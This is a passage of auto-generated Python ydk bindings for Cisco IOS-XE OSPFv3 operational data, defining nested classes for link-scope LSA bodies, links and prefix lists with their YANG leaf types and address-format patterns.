                                self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
                                self.nssa.parent = self
                                self._children_name_map["nssa"] = "nssa"
                                self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
                                self.link_data.parent = self
                                self._children_name_map["link_data"] = "link-data"
                                self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
                                self.ia_prefix.parent = self
                                self._children_name_map["ia_prefix"] = "ia-prefix"
                                self._segment_path = lambda: "lsa-body"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                # Restrict attribute writes to the declared YANG leafs.
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
                            class Network(Entity):
                                """
                                OSPFv3 network LSA body.

                                .. attribute:: attached_router

                                    List of the routers attached to the network

                                    **type**\: list of int

                                    **range:** 0..4294967295

                                    **config**\: False

                                .. attribute:: lsa_net_options

                                    Network LSA options

                                    **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`

                                    **config**\: False

                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    # Auto-generated ydk initializer for the "network" container.
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()
                                    self.yang_name = "network"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                                        ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
                                    ])
                                    # attached_router is a leaf-list (YLeafList) -> plain python list.
                                    self.attached_router = []
                                    self.lsa_net_options = Bits()
                                    self._segment_path = lambda: "network"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    # Restrict attribute writes to the declared YANG leafs.
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
                            class Prefix(Entity):
                                """
                                OSPFv3 inter\-area prefix LSA body.

                                .. attribute:: metric

                                    Metric

                                    **type**\: int

                                    **range:** 0..4294967295

                                    **config**\: False

                                .. attribute:: ia_prefix

                                    Inter area Prefix

                                    **type**\: str

                                    **config**\: False

                                .. attribute:: ia_prefix_options

                                    Inter area prefix options

                                    **type**\: str

                                    **config**\: False

                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    # Auto-generated ydk initializer for the "prefix" container.
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()
                                    self.yang_name = "prefix"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                        ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
                                        ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
                                    ])
                                    self.metric = None
                                    self.ia_prefix = None
                                    self.ia_prefix_options = None
                                    self._segment_path = lambda: "prefix"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    # Restrict attribute writes to the declared YANG leafs.
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
                            class IaRouter(Entity):
                                """
                                OSPFv3 inter\-area router LSA body.

                                .. attribute:: metric

                                    Metric

                                    **type**\: int

                                    **range:** 0..4294967295

                                    **config**\: False

                                .. attribute:: destination_router_id

                                    Router ID of the router being described by the LSA

                                    **type**\: int

                                    **range:** 0..4294967295

                                    **config**\: False

                                .. attribute:: lsa_ia_options

                                    Inter area LSA options

                                    **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`

                                    **config**\: False

                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    # Auto-generated ydk initializer for the "ia-router" container.
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()
                                    self.yang_name = "ia-router"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                        ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
                                        ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
                                    ])
                                    self.metric = None
                                    self.destination_router_id = None
                                    self.lsa_ia_options = Bits()
                                    self._segment_path = lambda: "ia-router"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    # Restrict attribute writes to the declared YANG leafs.
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
                            class LsaExternal(Entity):
                                """
                                OSPFv3 external LSA body.

                                .. attribute:: metric

                                    Metric

                                    **type**\: int

                                    **range:** 0..4294967295

                                    **config**\: False

                                .. attribute:: flags

                                    LSA Flags

                                    **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags>`

                                    **config**\: False

                                .. attribute:: referenced_ls_type

                                    Referenced Link State type

                                    **type**\: int

                                    **range:** 0..65535

                                    **config**\: False

                                .. attribute:: external_prefix

                                    Prefix

                                    **type**\: str

                                    **config**\: False

                                .. attribute:: external_prefix_options

                                    Prefix options

                                    **type**\: str

                                    **config**\: False

                                .. attribute:: forwarding_address

                                    Forwarding address (IPv4 dotted\-quad or IPv6 text form)

                                    **type**\: union of the below types:

                                        **type**\: str

                                        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                                        **type**\: str

                                        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

                                    **config**\: False

                                .. attribute:: external_route_tag

                                    Route tag

                                    **type**\: int

                                    **range:** 0..4294967295

                                    **config**\: False

                                .. attribute:: referenced_link_state_id

                                    Referenced Link State ID

                                    **type**\: int

                                    **range:** 0..4294967295

                                    **config**\: False

                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    # Auto-generated ydk initializer for the "lsa-external" container.
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()
                                    self.yang_name = "lsa-external"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
                                    self._leafs = OrderedDict([
                                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                        ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                                        ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                                        ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                                        ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                                        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                    ])
                                    self.metric = None
                                    self.referenced_ls_type = None
                                    self.external_prefix = None
                                    self.external_prefix_options = None
                                    self.forwarding_address = None
                                    self.external_route_tag = None
                                    self.referenced_link_state_id = None
                                    self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
                                    self.flags.parent = self
                                    self._children_name_map["flags"] = "flags"
                                    self._segment_path = lambda: "lsa-external"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    # Restrict attribute writes to the declared YANG leafs.
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
                                class Flags(Entity):
                                    """
                                    LSA Flags.

                                    .. attribute:: e_flag

                                        When set, the metric specified is a Type 2 external metric

                                        **type**\: bool

                                        **config**\: False

                                    """
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        # Auto-generated ydk initializer for the "flags" container.
                                        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()
                                        self.yang_name = "flags"
                                        self.yang_parent_name = "lsa-external"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []
                                        self._child_classes = OrderedDict([])
                                        self._leafs = OrderedDict([
                                            ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                                        ])
                                        self.e_flag = None
                                        self._segment_path = lambda: "flags"
                                        self._is_frozen = True
                                    def __setattr__(self, name, value):
                                        # Restrict attribute writes to the declared YANG leafs.
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
                            class Nssa(Entity):
                                """
                                OSPFv3 NSSA LSA body (wraps a single NSSA\-external entry).

                                .. attribute:: lsa_nssa_external

                                    NSSA LSA

                                    **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal>`

                                    **config**\: False

                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    # Auto-generated ydk initializer for the "nssa" container.
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()
                                    self.yang_name = "nssa"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
                                    # Container has no leafs of its own, only the child container.
                                    self._leafs = OrderedDict()
                                    self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
                                    self.lsa_nssa_external.parent = self
                                    self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
                                    self._segment_path = lambda: "nssa"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    # No settable leafs on this container.
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)
                                class LsaNssaExternal(Entity):
                                    """
                                    NSSA LSA.

                                    .. attribute:: metric

                                        Metric

                                        **type**\: int

                                        **range:** 0..4294967295

                                        **config**\: False

                                    .. attribute:: flags

                                        LSA Flags

                                        **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags>`

                                        **config**\: False

                                    .. attribute:: referenced_ls_type

                                        Referenced Link State type

                                        **type**\: int

                                        **range:** 0..65535

                                        **config**\: False

                                    .. attribute:: external_prefix

                                        Prefix

                                        **type**\: str

                                        **config**\: False

                                    .. attribute:: external_prefix_options

                                        Prefix options

                                        **type**\: str

                                        **config**\: False

                                    .. attribute:: forwarding_address

                                        Forwarding address (IPv4 dotted\-quad or IPv6 text form)

                                        **type**\: union of the below types:

                                            **type**\: str

                                            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                                            **type**\: str

                                            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

                                        **config**\: False

                                    .. attribute:: external_route_tag

                                        Route tag

                                        **type**\: int

                                        **range:** 0..4294967295

                                        **config**\: False

                                    .. attribute:: referenced_link_state_id

                                        Referenced Link State ID

                                        **type**\: int

                                        **range:** 0..4294967295

                                        **config**\: False

                                    """
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        # Auto-generated ydk initializer for the "lsa-nssa-external"
                                        # container.
                                        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()
                                        self.yang_name = "lsa-nssa-external"
                                        self.yang_parent_name = "nssa"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []
                                        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
                                        self._leafs = OrderedDict([
                                            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                                            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                                            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                                            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                                            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                        ])
                                        self.metric = None
                                        self.referenced_ls_type = None
                                        self.external_prefix = None
                                        self.external_prefix_options = None
                                        self.forwarding_address = None
                                        self.external_route_tag = None
                                        self.referenced_link_state_id = None
                                        self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
                                        self.flags.parent = self
                                        self._children_name_map["flags"] = "flags"
                                        self._segment_path = lambda: "lsa-nssa-external"
                                        self._is_frozen = True
                                    def __setattr__(self, name, value):
                                        # Restrict attribute writes to the declared YANG leafs.
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
                                    class Flags(Entity):
                                        """
                                        LSA Flags.

                                        .. attribute:: e_flag

                                            When set, the metric specified is a Type 2 external metric

                                            **type**\: bool

                                            **config**\: False

                                        """
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            # Auto-generated ydk initializer for the "flags" container.
                                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
                                            self.yang_name = "flags"
                                            self.yang_parent_name = "lsa-nssa-external"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                                            ])
                                            self.e_flag = None
                                            self._segment_path = lambda: "flags"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            # Restrict attribute writes to the declared YANG leafs.
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
                            class LinkData(Entity):
                                """
                                OSPFv3 Link data.

                                .. attribute:: rtr_priority

                                    Router priority of the interface

                                    **type**\: int

                                    **range:** 0..255

                                    **config**\: False

                                .. attribute:: link_local_interface_address

                                    The originating router's link\-local interface address on the link

                                    **type**\: union of the below types:

                                        **type**\: str

                                        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                                        **type**\: str

                                        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

                                    **config**\: False

                                .. attribute:: num_of_prefixes

                                    Number of prefixes

                                    **type**\: int

                                    **range:** 0..4294967295

                                    **config**\: False

                                .. attribute:: lsa_id_options

                                    Link data LSA options

                                    **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`

                                    **config**\: False

                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    # Auto-generated ydk initializer for the "link-data" container.
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()
                                    self.yang_name = "link-data"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
                                        ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
                                        ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
                                        ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
                                    ])
                                    self.rtr_priority = None
                                    self.link_local_interface_address = None
                                    self.num_of_prefixes = None
                                    self.lsa_id_options = Bits()
                                    self._segment_path = lambda: "link-data"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    # Restrict attribute writes to the declared YANG leafs.
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
                            class IaPrefix(Entity):
                                """
                                OSPFv3 Intra area prefixes.

                                .. attribute:: referenced_ls_type

                                    Referenced Link State type

                                    **type**\: int

                                    **range:** 0..65535

                                    **config**\: False

                                .. attribute:: referenced_link_state_id

                                    Referenced Link State ID

                                    **type**\: int

                                    **range:** 0..4294967295

                                    **config**\: False

                                .. attribute:: referenced_adv_router

                                    Referenced Advertising Router (IPv4 dotted\-quad or IPv6 text form)

                                    **type**\: union of the below types:

                                        **type**\: str

                                        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

                                        **type**\: str

                                        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

                                    **config**\: False

                                .. attribute:: num_of_prefixes

                                    Number of prefixes

                                    **type**\: int

                                    **range:** 0..65535

                                    **config**\: False

                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    # Auto-generated ydk initializer for the "ia-prefix" container.
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()
                                    self.yang_name = "ia-prefix"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                        ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
                                        ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
                                    ])
                                    self.referenced_ls_type = None
                                    self.referenced_link_state_id = None
                                    self.referenced_adv_router = None
                                    self.num_of_prefixes = None
                                    self._segment_path = lambda: "ia-prefix"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    # Restrict attribute writes to the declared YANG leafs.
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
                    class Ospfv3Link(Entity):
                        """
                        OSPFv3 links (YANG list keyed by interface\-id,
                        neighbor\-interface\-id and neighbor\-router\-id).

                        .. attribute:: interface_id  (key)

                            Interface ID

                            **type**\: int

                            **range:** 0..4294967295

                            **config**\: False

                        .. attribute:: neighbor_interface_id  (key)

                            Neighbor interface ID

                            **type**\: int

                            **range:** 0..4294967295

                            **config**\: False

                        .. attribute:: neighbor_router_id  (key)

                            Neighbor router ID

                            **type**\: int

                            **range:** 0..4294967295

                            **config**\: False

                        .. attribute:: type

                            Link type

                            **type**\: int

                            **range:** 0..255

                            **config**\: False

                        .. attribute:: metric

                            Metric

                            **type**\: int

                            **range:** 0..65535

                            **config**\: False

                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            # Auto-generated ydk initializer for the "ospfv3-link" list entry.
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()
                            self.yang_name = "ospfv3-link"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            # Composite list key: all three IDs identify one link entry.
                            self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
                                ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
                                ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
                                ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                            ])
                            self.interface_id = None
                            self.neighbor_interface_id = None
                            self.neighbor_router_id = None
                            self.type = None
                            self.metric = None
                            # Segment path embeds all three key predicates.
                            self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            # Restrict attribute writes to the declared YANG leafs.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
                    class Ospfv3PrefixList(Entity):
                        """
                        OSPFv3 prefix\-list (YANG list keyed by prefix).

                        .. attribute:: prefix  (key)

                            Prefix

                            **type**\: str

                            **config**\: False

                        .. attribute:: prefix_options

                            Prefix options

                            **type**\: str

                            **config**\: False

                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            # Auto-generated ydk initializer for the "ospfv3-prefix-list" list entry.
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()
                            self.yang_name = "ospfv3-prefix-list"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['prefix']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                            ])
                            self.prefix = None
                            self.prefix_options = None
                            self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            # Restrict attribute writes to the declared YANG leafs.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value)
                    class Ospfv3IaPrefix(Entity):
                        """
                        OSPFv3 intra\-area prefix\-list (YANG list keyed by prefix).

                        .. attribute:: prefix  (key)

                            Prefix

                            **type**\: str

                            **config**\: False

                        .. attribute:: prefix_options

                            Prefix options

                            **type**\: str

                            **config**\: False

                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            # Auto-generated ydk initializer for the "ospfv3-ia-prefix" list entry.
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()
                            self.yang_name = "ospfv3-ia-prefix"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['prefix']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                            ])
                            self.prefix = None
                            self.prefix_options = None
                            self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            # Restrict attribute writes to the declared YANG leafs.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
                    class MultiTopology(Entity):
                        """
                        OSPF multi\-topology interface augmentation.

                        .. attribute:: name  (key)

                            One of the topologies enabled on this interface

                            **type**\: str

                            **config**\: False

                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
